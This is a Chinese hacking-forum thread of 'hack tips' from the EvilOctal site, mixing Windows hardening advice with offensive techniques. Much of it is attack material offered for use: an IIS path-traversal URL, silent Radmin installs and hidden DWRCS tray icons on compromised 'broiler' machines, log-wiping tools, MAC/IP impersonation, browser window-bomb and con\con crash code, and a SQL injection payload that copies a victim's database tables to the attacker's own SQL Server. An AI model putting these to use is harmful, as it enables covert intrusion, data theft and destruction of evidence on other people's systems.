[TIPS]Some Useful Hack Tips of EST
信息来源:邪恶八进制 中国本帖发一些基础性的Hack小技巧 或者是基础问题的解答...
楼号就是帖的数字了:)
大家可以跟....格式一样就好了...
TIPS里严禁灌水 否则杀 禁止远程访问注册表
In order to keep your data away from the black hats, you should do more about your system, just like pay more attention to the remote registry service!!!
方法一、
右键单击‘我的电脑’,选‘管理’,‘服务和应用程序’,‘服务’!
停止并且禁用Remote Registry Service服务!
方法二、
打开注册表编辑器的如下键:
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSecurePipeServers
把其下的WinReg的键职改成1就可以了。 禁止非管理员用户使用AT命令
这个小技巧的好处应该不言而喻:)
启动注册表编辑器,展开如下键:
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa
在右边新建立一个SubmitControl键名,DWORD值为1。 使LINUX对PING不响应
LINUX应该逐渐成为各位大峡小鸟手中之宝了吧?怎么才能让它不响应ICMP来保护自己呢?
可以用:
echo 1 > /proc/sys/net/ipv4/icmp_echo_igore_all
想恢复的时候用:
echo 0 > /proc/sys/net/ipv4/icmp_echo_igore_all 让WIN98安全模式支持网络
大家都知道WIN98安全模式要是可以进去,是可以不受网吧安全管理软件的约束的!BUT安全模式不加载网络驱动,下面冰血告诉你一种让WIN98的安全模式提供网络支持的方法。
1、F8进入安全模式。
2、选择Command Prompt Only。
3、进入命令行状态时,输入Win /d:n即可以进入代命令行的安全模式。 修改Terminal Server的端口
服务端
进入注册表编辑器,依次展开如下键名:
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWdsrdpwdTdstcp
在右窗口中修改PortNumber的数值为任意端口号,推荐1025<端口号<65535
客户端
启动Terminal Server Client的客户端管理器,到出连接文件为*.cns,用记事本打开修改Server Port与服务器一致就OK了.
最后将修改过的*.cns重新导入Terminal Server Client的客户端管理器。启动IP路由功能
一般我们在WINDOWSNT/2K/XP使用ARP欺骗攻击的时候都需要先打开IP路由功能。
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
IPEnableRouter=0x1 强大的FC对比命令
我们在使用系统和进行各种任务的时候经常需要用到文件的对比,那么我们是自己一点点的对比么?当然不是我们用强大的FC对比命令。
具体参数请用FC /?进行查看 通过验证Banner手工鉴别FTP
cmd下输入
ftp TargetIP
User (TargetIP:(none)):ftp
331 User name okey, please send complete E-mail address as password.
Password:
如果成功
230 User logged in, proceed.
如果失败
530 Sorry, no ANONYMOUS access allowed.
特别是这一行字是Serv-U的特有标志
331 User name okey, please send complete E-mail address as password.
假如是MS FTP呢
cmd下输入
ftp TargetIP
220 antivirus Microsoft FTP Serveice(Version 5.0).
User (TargetIP:(none)): ftp
331 Password required for ftp.
Password:
530 User ftp cannot log in.
特别是这一行字是MS FTP的特有标志
331 Password required for ftp. 漏洞qsumrhit.htw和iirturnh.htw的使用方法
这个比较希奇,还是说说:
提交例如如下的连接就可以了……
连接[url]http://www.xxxx.com/iissamples/issamples/oop/qsumrhit.htw?ciwebhitsfile=/../../winnt/win.ini&cirestriction=none&cihilitetype=full[/url] 远程控制软件Radmin安装注意事项
网络渗透中。使用远程安装Radmin的进行控制时候,必须使用如下命令:
Radmin /install /silence
否则对方的计算机窗口会弹出一个提示框说“远程管理服务已经安装”。 终端服务客户端的操作问题
注意,通过克隆而获得管理员权限的用户是和管理员共用一个桌面的。如果你在桌面建立东西,管理员那边是同样可以看见的。 注册成服务的黑客软件的各项指标修改方法
假如你已经吧一个叫hackertools的工具注册成了系统的服务,在服务列表中存在。那么你要怎么修改他的名字呢?
这里进入注册表
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services
找到它的服务名,假设是hcktol,现在展开他的下面间。
displayname就是服务显示名
description就是服务描述
另外可以通过用16进制编辑器修改服务进程名。
用辅助工具instsrv.vbs把程序安装成自己的指定服务名和服务相识名服务。具体请看帮助,到处有下。 有关清除日志的话题
By 冰血封情
[url]http://www.EvilOctal.com/forum/read.php?tid=1881[/url]
[url]http://www.EvilOctal.com/forum/read.php?tid=1821[/url]
[url]http://www.EvilOctal.com/forum/read.php?tid=1781[/url]
[url]http://www.EvilOctal.com/forum/read.php?tid=1610[/url]
[url]http://www.EvilOctal.com/forum/read.php?tid=1581[/url]
[url]http://www.EvilOctal.com/forum/read.php?tid=1490[/url]
[url]http://www.EvilOctal.com/forum/read.php?tid=1429[/url]
[url]http://www.EvilOctal.com/forum/read.php?tid=1337[/url]
[url]http://www.EvilOctal.com/forum/read.php?tid=1236[/url]
[url]http://www.EvilOctal.com/forum/read.php?tid=992[/url]
[url]http://www.EvilOctal.com/forum/read.php?tid=942[/url]
[url]http://www.EvilOctal.com/forum/read.php?tid=594[/url]
[url]http://www.EvilOctal.com/forum/read.php?tid=196[/url]
[url]http://www.eviloctal.com/forum/read.php?tid=2016[/url]
以上是在 邪恶八进制(EvilOctal)暨安全高峰(SecurityPeak)论坛上 以关键字为“日志”的资料索引 分别对应如下主题:
[转帖]3389如何擦除日志
[转载]关于入侵检测系统之日志检测详解
[转载]入侵检测之日志检测
[转载]国外的培训课程 安全日志的秘密
[转载]Windows日志的保护与伪造
[转载]用perl写了个把IIS日志导入到mysql的程序
[转载]终端服务的日志监控
[转载]删除sql server日志
[转载]WINDOWS安全事件日志中的事件编号与描述
[转载]如何用elsave清除日志
[转载]FreeBSD的系统log日志
[转载]UNIX系统后门的安放和日志的擦除
[转载]安全事件日志事件编号与描述
[转载]详述Windows 2000的日志及其删除方法
共13条信息
非常感谢你支持偶们!
关于...自动清除日志软件类很多
如:
小榕的elsave清除日志工具
小榕的CleanIISLog来自动清除日志
还有CSDN公布的ClearLogs工具
以及擦PP工具0x333shadow
专业清除日志iisantidote-v2工具也可以
工具多多 自己搜索 绝大多数论坛的ToolsWay版面都有的...88 无法删除文件的问题
By 冰血封情[EST]
有时候我们要删除一些文件 经常提示无法删除 EvilOctal总结了一下 主要有以下几种可能
第一 文件名中可能有特殊符号
那么无论你是在操作系统中 还是使用命令行下的del命令都是无法删除的 这时解决方法是使用命令rd "\\?\文件路径\文件名" 就可以删除了
第二 有可能是文件正在使用中
那么只要找到正在使用该软件的进程 终止后删除 当然一般情况下也可以到安全模式或者命令行下删除的
第三 可能是文件的优先级不够高
在任务管理器里 把相关进程的优先级降低 然后再一顿狂杀乱砍
第四 也许是磁盘有逻辑错误
使用chkdsk检查一下再行删除看看 有关mid音乐格式的音轨调查
今天朋友FlyingBird传输了一个音乐给我 mid格式的 但是实在是播放不了
原来 mid音频走的是 音乐控制面版中的 软件合成器 的音轨
不想 我把他静音了 所以什么也听不见
在 主音量 控制面版里将 软件合成器 钩取消后就可以下的 静音 取消就可以放了... 在139入侵过程中遇见host not found?
By 冰血封情[EST]
在正常情况下应该是这样的:
[QUOTE]
Node IpAddress: [xxx.xxx.x.xxx] Scope Id: []
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
REFDOM <00> UNIQUE Registered
REFDOM <03> UNIQUE Registered
REFDOM <20> UNIQUE Registered
REFDOM$ <03> UNIQUE Registered
INet~Services <1C> GROUP Registered
IS~REFDOM.......<00> UNIQUE Registered
……
MAC Address = XX-XX-XX-XX-XX-XX
[/QUOTE]
如果对方有文件(或者打印)共享,那么就会显示类似上面的信息。如果出现的是 ‘Host Not Found’,那么就可能没有提供共享或者安装了防火墙之类的软件阻隔了,具体情况冰血封情也很难猜测了:) 3389端口开放配合输入法漏洞攻击法
By 冰血封情[EST]
这个可是个老漏洞了 当然很多菜鸟还在找 汗...
以下是邪恶八进制(EvilOctal)暨安全高峰(SecurityPeak)论坛上 截止9月10日的3389攻防主题索引
[url]http://www.eviloctal.com/forum/read.php?tid=1881[/url]
[url]http://www.eviloctal.com/forum/read.php?tid=1015[/url]
[url]http://www.eviloctal.com/forum/read.php?tid=125[/url]
[url]http://www.eviloctal.com/forum/read.php?tid=1593[/url]
[url]http://www.eviloctal.com/forum/read.php?tid=1429[/url]
[url]http://www.eviloctal.com/forum/read.php?tid=534[/url]
[url]http://www.eviloctal.com/forum/read.php?tid=162[/url]
[url]http://www.eviloctal.com/forum/read.php?tid=151[/url]
[url]http://www.eviloctal.com/forum/read.php?tid=124[/url]
[url]http://www.eviloctal.com/forum/read.php?tid=65[/url]
....
分别对应
[转帖]3389如何擦除日志
[转载]远程开启3389终端服务
[转载]总结开3389的5种方法
[转帖]怎么记录3389登录者的IP
[转载]终端服务的日志监控
[转载]菜鸟使用SC远程启动终端服务的误区
[转载]终端服务使用大全
[转载]修改终端服务端口的方法
[转载]远程启动终端服务最简单的方法
[转载]终端服务全攻略
....
其他的请自己搜索... JAVASCRIPT开无数窗口代码讨论
<script language="javascript">for(i=0;i<100;i++){window.open()}</script>
这个其实是早先的JAVASCRIPT网页炸弹 利用for循环或while循环不断地开窗口
具体使用方法是 在HTML的网页的BODY中插入这段代码
然后打开了就会自动跳出100个窗口
[code]<html><head><title>Hackway Power Of China</title></head>
<body bgcolor="#666696" text="#000000" id="all" leftmargin="10" topmargin="10" marginwidth="10" marginheight="10" link="#000020" vlink="#000020" alink="#000020">
<div align="center"><A HREF="" onmouseover="while(true){window.open()}">冰血封情冰雪心</A>
</div>
</body></html>
[/code]
那么其实我们还可以进一步使用……
让其不点连接就直接跳出窗口
下面给出完整代码: 漫谈无标识的共享的实现以及修改硬盘图标
By 冰血封情[EST]
运行Regedit命令,打开注册表,找到下面的子键:HKEY_LOCAL_MACHINE\software\Mi-crosoft\Windows\CurrentVersion\Network\Lanman\C$,在屏幕的右边,你就可以看见下面的内容:
Flags 0x00000302(770)
Parm1enc(长度为零的二进制值)
Parm2enc(长度为零的二进制值)
Path"c:"
Remark"Remark By Scent Lily"
Type 0x00000000(0)
关键的地方就是FLAG这个参数,它的键值决定了共享目录的类型。普通共享是191,隐藏共享是102……
而我们把FLAGS的值设为302(16进制,其实就是770)就可以实现无共享标识的共享了。注意这里不但没有‘小手’,而且甚至右键菜单的‘属性’也看不出来共享哦:)GOOD LUCK
下面我们说说如何自定义硬盘图标
新建一个AutoRun.inf文件。内容如下:
[autorun]
ICON=X.ico
其中X.ico就是图标的文件名,如果不在同一目录就要写路径。 无法把文件拷贝到名字具有空格的文件夹
FAQ作者 Sunlion[EST]
今天想把一个good.bat的文件拷贝到
c:\Documents and Settings\All Users\「开始」菜单\程序\启动
但是
copy d:\good.bat c:\Documents and Settings\All Users\「开始」菜单\程序\启动
都有错误,系统提示:命令语法不正确。
大家遇到此情况,那么就可以转换以下:
先是:
cd c:\Documents and Settings\All Users\「开始」菜单\程序\启动
把c:\Documents and Settings\All Users\「开始」菜单\程序\启动 设置为当前目录
在实行:
copy d:\good.bat
就没有错了!
[quote]
其实很简单, 加个引号就可以了..
copy d:\good.bat "c:\Documents and Settings\All Users\「开始」菜单\程序\启动"
原因是 c:\Documents and Settings\All Users\「开始」菜单\程序\启动 这个路径里有空格
by zhouzhen
[/quote] 海洋顶端2005a.asp列不出目录的问题
有的时候海阳顶端网2005a.asp在有的机器上列不出虚拟目录的文件
lcx经过多次测试发现 只要wscript.shell被删或被禁用的情况下 就会列不出目录
解决这个问题的办法是用2004.asp 在二层交换机上DHCP实现跨VLAN的服务的话题
以下是专家romemeteor的回答...
当然可以 但是必须在特定的型号上
譬如 NetGear最新 推出的 二层千兆交换机GSM7224
其 就支持
GSM7224拥有丰富的二层管理功能,包括提供网络带宽优化、网络安全、网络控制等各方面。完整的SNMP、RMON、DHCP以及BOOTP可满足你所有的交换机管理要求。先进的功能包括有多达228个VLAN、流量优先级902.1p (QoS) 可确保如VoIP等关键应用、广播风暴控制、RADIUS、IEEE802.1x基于端口的安全访问控制、端口捆绑、快速生成树协议 (RSPT)。丰富的二层功能可确保网络最大的性能、可靠、可用和可控。
而如何通过具体的命令实现它,我想看manual应该可以得到答案吧
附件为三层交换机 的 一些技术 知识 其中对VLAN有很详细的介绍
看一看 然后再理解为什么要在 大多数 都是在三层交换机上 DHCP支持VLan了;
更具体的可以 去看看
[url]http://www.netgear.com/products/details/GSM7324.php[/url]
附件为三层交换机 的 一些技术 知识 其中对VLAN有很详细的介绍
看一看 然后再理解为什么要在 大多数 都是在三层交换机上 DHCP支持VLan了;
更具体的可以 去看看
[url]http://www.netgear.com/products/details/GSM7324.php[/url]
呵呵 是 7324 EXE文件关联的恢复方法
By 冰血封情[EST]
很多朋友在查杀木马后,发现很多文件关联破坏了,如:.exe .txt .inf .ini等等文件都不能使用了……甚至是进硬盘的时候,双击硬盘图标都无法进入……
好了,首先我们恢复.exe文件管联:
先看看你计算机里面.com的文件可以使用么?如果可以,那么就接着往下;如果不可以,就要另外想办法(根据中国暗域网络成员'鱼'的情况,.com是可以使用的)。
我们这里修复环境以'于戬'的为准——WINDOWS98操作系统+.com文件可以使用+硬盘可以进入+.exe .txt破坏
方法一、
恢复.exe具体方法如下:
1、在'文件夹选项'里设置'显示所有文件',并且取消对'隐藏已知文件的扩展名'的选择。
2、在'开始'-'搜索'里对C盘搜索regedit.exe文件,这个regedit.exe是注册表编辑器,解决问题需要它。
3、搜索到了后,把regedit.exe改名为regedit.com,然后双击打开,你可以进入注册表编辑器了。
4、依次进入注册表编辑器如下键'HKEY_CLASSES_ROOT\exefile\shell\open\command',双击右窗口中的'默认'键名,将它的键值修改为%1 %*后按F5刷新注册表就可以了。
5、关闭注册表编辑器,看是不是恢复了?
恢复.txt具体方法如下:
第一种方法
1、在桌面上新建立一个'文本文件',然后按住键盘上的SHIFT键,同时用鼠标右键单击,在菜单中选择'打开方式',找到wordpad(写字板)选中它,并且选中'始终用此程序打开',点'确定'。
2、同样是刚才那个'文本文件',再按住键盘上的SHIFT键,同时用鼠标右键单击,在菜单中选择'打开方式',找到NOTEPAD(记事本)选中它,并且也选中'始终用此程序打开',点'确定'。
3、现在看看你的.txt文件关联恢复了么?
第二种方法
依次进入注册表编辑器如下键'HKEY_CLASSES_ROOT\txtfile\shell\open\command',双击右窗口中的'默认'键名,将它的键值修改为C:\WINDOWS\NOTEPAD.EXE %1后按F5刷新注册表就可以了。
方法二、
如果想一次全恢复恢复Windows默认的文件关联点击“开始→运行”,分别输入:
rundll setupx.dll,InstallHinfSection DefaultInstall 132 c:\windows\inf\shell.inf回车
regsvr32.exe /i shdocvw.dll回车
regsvr32 /i shell32.dll回车
regsvr32.exe /i shdoc401.dll回车
这样一来,所有的你发现坏了的,没发现坏了的都恢复了。推荐使用这个方法~~
如果你已经使用了前面的方法一、并不影响您是用方法二、…… LAN中伪装主机技术揭密
By 冰血封情[EST]
注意,本方法也许可以在一定程度上帮助你,但是危害比较大,也比较容易被捉,不过也只有这样才有可能了!因为听你的描述,LAN的情况是管理员把MAC和IP捆绑了!那么具体突破方案如何实施,如下:
本文章需要软件:SUPER SCAN和MAC DRAW和SKYNET FIREWALL
软件链接:
先用SUPER SCAN扫描可以全天候上网的所有网段,找出可以PING的通的。然后用MAC DRAW扫描刚才可以PING通的天候上网的IP。
现在选中一台计算机,将它所有被MAC DRAW刺探到的信息记录下来……IP地址、机器名、工作组。现在用SKYNET FIREWALL切断自己的网络连接。
1、鼠标右键单击'我的电脑'-'属性'-'网络标识'-'属性',把你的计算机的所有信息都改成刚才你记录的那台计算机的。
2、再次启动MAC DRAW,点击更改MAC地址,把你自己的MAC地址也改成那个可以全天上网的。
现在重新启动,如果没有报错,你就应该可以全天上网了!
这其实是一种完全伪装的方法,但是被伪装机却可以正常访问(具体是否可以达到相同的权限只是理论上可以!)……
另外,伪装计算机和被伪装计算机都会不稳定!
我也只能尽力而为了:) Microsoft Windows2000默认共享分析
By 冰血封情[EST]
众所周知,WINDOWS2000默认共享一直是困扰新手们的问题之一。很多新手在关闭默认共享的时候,总是遇见这样那样的问题。如:怎么关闭以后重新启动计算机又打开了啊?怎么IPC$打了补丁还在啊?……
今天,我就给大家对如何正确的关闭默认共享,做一个小小的分析和总结。
您可以打开一个CMD窗口,键入net share<回车>,这样可以检查你的计算机是否开了默认共享,甚至是其他共享(注意:这里以Leader计算机的问题为主,只讲默认共享,其他的自己去查看NET命令的NET SHARE内容,URL。当然您也可以直接学习NET命令也不错,URL。)。然后记下共享的名字,如:C$、D$、ADMIN$、IPC$……
现在我们来清除目前所有的默认,编写如下批处理文件,内容如下:
[QUOTE]
net share c$ /delete
net share d$ /delete
net share admin$ /delete
net share ipc$ /delete
[/QUOTE]
(根据Leader的情况这里介绍如何做批处理文件)
共享请新建一个文本文档,然后将以上的内容拷贝进去,然后选择文本编辑器工具栏的'文件(F)'-'另存为(A)...',然后会弹出一个'另存为'窗口。将窗口的最下面的'保存类型(T):'选择为'所有文件 (*.*)',在'文件名(N):'这里写你想要起的文件名。但是记住,一定要起X.bat这样的名字,X是你随便想起的文件名,但是一定在文件名后要有.bat就OK了!然后保存后执行这个批处理文件。这样就会删除你计算机上现在有的默认共享了。
以上做完了还不行……
现在启动注册表编辑器,依次展开如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters],这样你应该可以在右边窗口看见'AutoShareWks"键名和"AutoShareServer"键名。将他们修改为如下的样子:
[QUOTE]
"AutoShareWks"=dword:00000000
"AutoShareServer"=dword:00000000
[/QUOTE]
(注意:要是没有,要建立成上面的样子。千万不可以用删除的方法,因为删除后执行的是默认设置,那样就是DWORD=00000001了!)
这样默认共享就完全删除了。WINDOWS2000同等情况还有个空连接,是IPC$的老问题了。IPC$有人叫它'管道通信',也有人叫'进程间通信',还有叫它'网际进程连接'的,总之就是那个意思。如果空连接上了只能是GUEST权限(有些书写的,一空连接上了就加管理员帐号,干这这那那管理员权限或者系统权限的问题,冰血封情实在吐血),但是GUEST用户的威胁也很大,可以提升权限,一般我们都是禁用它的。所以干脆把它也禁止……
现在继续修改编辑器,[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa],把restrictanonymous的DWORD键值改成00000001或者00000002。如果设置为DWORD:00000002,那么有些服务的启动会受到影响,如:SQL Server等……,但是设置为00000001也不是完美的,还是可以被一些成许刺探到你的用户名和用户信息,不过至少安全点儿了,你不是还有防火墙呢么Leader?:)
如果Leader觉得看了头昏,那么你刻执行我上传的附件文件,是我帮你写好的BATCH文件,他会帮你一次全完成上术所有工作。所有工作晚成要重新启动计算机哦…… 在CMD下共享某盘
By Sunlion[EST]
今天在局域网内闲逛,进入了一台无法上传东西的电脑,后来发现他共享了点东西,但是我想要的东西,他没有共享,于是就想起了
NET SHARE sharename
sharename=drive:path [/USERS:number | /UNLIMITED]
[/REMARK:"text"]
[/CACHE:Manual | Automatic | No ]
sharename [/USERS:number | /UNLIMITED]
[/REMARK:"text"]
[/CACHE:Manual | Automatic | No ]
{sharename | devicename | drive:path} /DELETE
*******************(以上是在CMD下系统给的提示)******************
但是我弄了半天没出来,对系统提示的理解有点问题,特别是sharename=drive:path
所以,我问了一下无锋之刃大哥,于是等到以下答案:
***********************************************************
(2004-10-27 16:53:05) 无锋之刃
F:\test\wxfile\Release>net share test=d: /remark:"testing" test 共享成功。
***********************************************************
呵呵!在此谢谢无锋之刃大哥!:)
假如大家要共享G盘
那么在提示副下输入:
net share G=g: /UNLIMITED /remark:"默认共享"
其中在=前面是共享的名称,/unlimited 表示无限制 /remark:""就是共享的备注
呵呵!估计也会有好多兄弟走了弯路吧! 用快捷方式最炸弹4Win98
如下内容写入txt
[InternetShortcut]
URL=http://127.0.0.1/
IconIndex=1
IconFile=C:\con\con.dll
命名为bomb.URL放C:\Windows\temp下
浏览这个目录.....兰屏 传说中恢复2KXP管理员帐号的方法
传说中 可能不准确...
编写一个批处理EvilOctal.bat内容:
net user administrator EvilOctal
然后放在...没有?建立尝试一下吧 我也不清楚
C:\WINDOWS\system32\GroupPolicy\Machine\Scripts\Startup
在其他的电脑上编辑Script.ini文件 格式如下:
(先空一行)
[Startup]
0CmdLine=加载的脚本名称 我们这里应该是EvilOctal.bat
0Parameters=接参数 空就可以了
[Shutdown]
0CmdLine=加载的关机脚本名称
0Parameters=接参数 空就可以了
这样就编辑完毕
然后想办法把bat拷到
C:\WINDOWS\system32\GroupPolicy\Machine\Scripts\Startup下
把Script.ini拷到
C:\WINDOWS\system32\GroupPolicy\Machine\Machine\Scripts\下
重新启动就OK
这样?如果C不是FAT还是麻烦:( 奇怪的IP数据包
IP包头的协议号为181 请问什么样的设备或者软件协议使用这个协议号?
181 ADC Kentrox Bruce Kropp ktxc8![email]bruce@uunet.UU.NET[/email] DWRCC 的远程链接图标删除
这个文件是这样的
[Settings]
;Property Page 1
:Port - 6129 is default
;Port=6129
;Absolute Timeout - in minutes
;Absolute Timeout=5
;Authentication Type - default is 6 (2 + 4)
;1 = Allow Proprietary Challenge/Response
;2 = Allow Windows NT Challenge/Response
;4 = Allow Encrypted (128 bit) Windows Logon
;Add the numbers to allow more then one i.e. 7 would be all (1 + 2 + 4)
;Authentication Type=6
Authentication Type=6
;Must Have Logon Locally Rights with Windows Logon - default if Yes
;Only valid with use of "Allow Encrypted (128 bit) Windows Logon"
;Must Have Logon Locally Rights with Windows Logon=Yes
;Must Have Logon Locally Rights with Windows Logon=No
;Property Page 2
;Requires Explicit Remote Admin Rights - default is No
;Requires Explicit Remote Admin Rights=No
;Allow Only Administrators To Connect - default in No
;Allow Only Administrators To Connect=No
;Requires Logon Locally Privilege - default is No
;Requires Logon Locally Privilege=No
…………
(后面省略)
…………
DWRCS.EXE就是在你肉鸡系统托盘上一闪一闪的那个图标,
要防止它在托盘出现,就给Dwrcs.ini前面加上下面这段:
[Settings]
Port=6129
Adgang NTLM=Yes
Adgang 1=
Adgang 2=
Adgang 3=0
Notify On New Connection=No
Permission Required=No
Show SysTray Icon=No
Permission Required for non Admin=Yes
On Disconnect Logoff Desktop=No
Force Applications Close=No
On Disconnect Lock Workstation=No
Logon At Logon Desktop Only=No
Enable Add Client Connection Menu=Yes
Enable Disconnection Menu=Yes 修改Terminal Server的端口
服务端
进入注册表编辑器,依次展开如下键名:
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWdsrdpwdTdstcp
在右窗口中修改PortNumber的数值为任意端口号,推荐1025<端口号<65535
客户端
启动Terminal Server Client的客户端管理器,到出连接文件为*.cns,用记事本打开修改Server Port与服务器一致就OK了.
最后将修改过的*.cns重新导入Terminal Server Client的客户端管理器。 揪出FlashGet中的暗纹密码
By 电脑教育报
FlashGet中有两个地方的密码会以星号密文显示,虽然这会提高软件的安全性,不过可能会对我们查看、共享信息带来了不便。下面介绍一下如何通过eXeScope这款汉化工具修改FlashGet来达到以明文显示密码的目的。
1. 让FlashGet中的站点资源探索器密码以明文显示
运行eXeScope,选择“文件→打开”,定位到FlashGet安装目录中的“FlashGet.exe”文件,依次展开“资源→对话框→128”,接下来在右侧的“Dialog:128”栏下选中“Edit”,单击“编辑”标签,勾选“密码”一项,最后保存退出即可,如图所示。
编辑提示:在编辑FlashGet文件的时候,请先退出FlashGet程序,否则会提示错误信息。
2. 让FlashGet中的代理服务器地址以明文显示
与上述方法类似,运行eXeScope,选择“文件→打开”菜单下的FlashGet.exe文件,依次展开“资源→对话框→149”,接下来在右侧的“Dialog:149”栏下选中“Edit”,单击“编辑”标签,勾选“密码”一项,设置完毕后保存退出。 在GATEWAY的封锁下使用OICQ
By 冰血封情[EST]
这位朋友,我没看明白您说的是什么意思?是公司的服務器不提供代理服务了,还是只是把8000换成了其他的端口呢??不过也管不了那么多了:)我还是就两种情况都分析一下吧……
第一种、把8000换成了其他的端口:
这个好办,只要使用扫描软件对网关服务器进行端口扫描,看看哪个端口开了Socks服务,就在QQ里面设置代理服务器,把端口和IP填上连接就可以了!
第二种、服務器不提供代理服务:
这个有点麻烦,但是还是可以解决的,如果您的QQ是会员号,那么可以选择使用HTTP协议登录,那样只要服务器开了HTTPPROXY就可以了(就是可浏览网页)!那么您一定会问,要是我不是会员号怎么办啊?那也没关系,我们可以把HTTP和SOCKS两种协议进行转换,具体方法如下。
有一款叫SocksOnline的软件([url]http://www.waysonline.com/mader/download/[/url]),可以帮你实现……具体……
第一步、启动,第一次运行要设置登录帐号,看着填就可以了。然后进入‘设置’-‘通讯设置’-‘HTTP通讯设置’,选中‘用户指定’,然后在框中相应填入公司服务器的IP和HTTP端口(因公司设置的HTTPPROXY端口而定,一般是80);
第二步、进入‘设置’-‘系统设置’-‘用户服务设置’,在‘主机’处填入腾讯服务器的地址(这个有很多,你自己可以在QQ系统设置里看到),然后‘端口’填入8000(这里是腾讯的服务器端口不是你公司的),本机端口:4000;
第三步、在自己的OICQ,进入‘登陆向导’的界面的‘网络设置’,选择使用Socks5代理,然后在那里填入IP:127.0.0.1、端口:1080,其他的空着……
现在你可以登陆你的QQ来爽了:)
当然,如果其他的朋友想上QQ,只要把你的计算机开起,然后设置你的内网IP为代理,端口1080就可以了,不用再自己设置上面,当然想拖动你的好朋友一起上,你得付出点自己的系统资源…… 冰血封情这么喜欢用注册表限制啊?
好啊,我也弄几个限制
限制我最讨厌的垃圾插件
对付3721的注册表脚本
REGEDIT4
#B83FC273-3522-4CC6-92EC-75CC86678DA4 /3721网络实名
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{B83FC273-3522-4CC6-92EC-75CC86678DA4}]
"Compatibility Flags"=dword:00000400
#1B0E7716-898E-48CC-9690-4E338E8DE1D3 /3721上网助手
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{1B0E7716-898E-48CC-9690-4E338E8DE1D3}]
"Compatibility Flags"=dword:00000400
#7CA83CF1-3AEA-42D0-A4E3-1594FC6E48B2 /3721上网助手
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{7CA83CF1-3AEA-42D0-A4E3-1594FC6E48B2}]
"Compatibility Flags"=dword:00000400
#7CA83CF1-3AEA-42D0-A4E3-1594FC6E48B2 /3721网络实名
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{4522DBFE-14CD-4A59-AC2A-54BADFDD6D53}]
"Compatibility Flags"=dword:00000400
#4EDBBAEA-F509-49F6-94D1-ECEC4BE5B686 /3721中文邮
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{4EDBBAEA-F509-49F6-94D1-ECEC4BE5B686}]
"Compatibility Flags"=dword:00000400
对付百度的
#9BBC1154-218D-453C-97F6-A06582224D81 /百度搜霸
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{9BBC1154-218D-453C-97F6-A06582224D81}]
"Compatibility Flags"=dword:00000400
#BC207F7D-3E63-4ACA-99B5-FB5F8428200C /百度搜索伴侣
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{BC207F7D-3E63-4ACA-99B5-FB5F8428200C}]
"Compatibility Flags"=dword:00000400
呵呵,还我一个清净的空间,不再弹出这些垃圾插件.需要禁止不同的插件烦恼,可以参考修改. 3389登陆看不到界面问题
by fhod[EST]
首先ctrl+alt+end调出远程的任务管理器...3389登陆的和本地的调出任务管理器的方法是不一样的
然后新建進程
explorer.exe没多会就看到了熟悉的界面了..
原理就不多说了
以后看不到桌面就看看进程是否有
explorer.exe
没有就新建个任务名为
explorer.exe 自动关闭停止响应程序
在注册表中打开HKEY_CURRENT_USER\Control Panel\Desktop目录,把里面的AugoEndTasks键值改为1。
如果注册表中找不到AutoEndTasks键值,则可以自己建一个串值并把它改为这个名字,值设为1就可以了。 注射的一些技巧
错了。。出错信息被屏蔽了。。怎么办?经过研究发现是里边的某些字符例如 +号需要转化成16进制。。或许还有别的地方要转化。。怎么办啊?
---------------------------------------------------------------------------------
这是浏览器导致的,并非对方的asp所谓,一些特殊符号不能直接在浏览器里面输入,
其实没有必要全部转换成%xx的模式,写个htm里面javascript
window.location.href=".....这里随便你了......"
就可以了,该转码的都会自己转码。
另外用sqlinject记住两点
浏览器选项高级里面
1. UTF8一定要关闭
2. 友好的http信息显示一定要关闭
另外如果要偷取一个对方库里面指定一个表的数据,简单的办法就是
假设你的本地sqlserver ip是202.99.8.1 sa空 1433 tcp 默认库pop
1。 创建一个表,两个个字段number和varchar(255)就可以,表名[tmp1]
2。 然后
news.asp?id=5 insert into opendatasource('sqloledb','driver={sql server};server=202.99.8.1;network=sbmssocn;address=202.99.8.1,1433;uid=sa;pwd=;database=pop').pop.dbo.tmp1 select [id],[name] from sysobjects where xtype='U' --
3。 无看看你的tmp1的内容,找到你想要的那个表,比如[news]对应的id=12345
4。 在你的sqlserver执行 select * into [tmpcolumns] from syscolumns where 1=2
5。 然后
news.asp?id=5 insert into opendatasource('sqloledb','driver={sql server};server=202.99.8.1;network=sbmssocn;address=202.99.8.1,1433;uid=sa;pwd=;database=pop').pop.dbo.tmpcolumns select * from sysobjects where id=12345 --
6。 现在看看tmpcolumns你已经得到这个news的所有字段信息了
7。 根据字段本地创建创建新表[newtable]
8。 然后
news.asp?id=5 insert into opendatasource('sqloledb','driver={sql server};server=202.99.8.1;network=sbmssocn;address=202.99.8.1,1433;uid=sa;pwd=;database=pop').pop.dbo.newtable select * from [news] --
以上方法不需要猜测表名,也不需要是sysadmin,所以只要有sqlinject漏洞并且是sqlserver的话,那么绝大多数都可以通过。并且你可以指定你要的表你要的字段,而不需要去down整个庞大的库。
不过sqlinject真的没必要花太多的精力在上面。
注:select * into [tmpcolumns] from syscolumns where 1=2的1=2判断绝对没有写错,这么做是一种复制表结构的偷懒办法
页:
[1]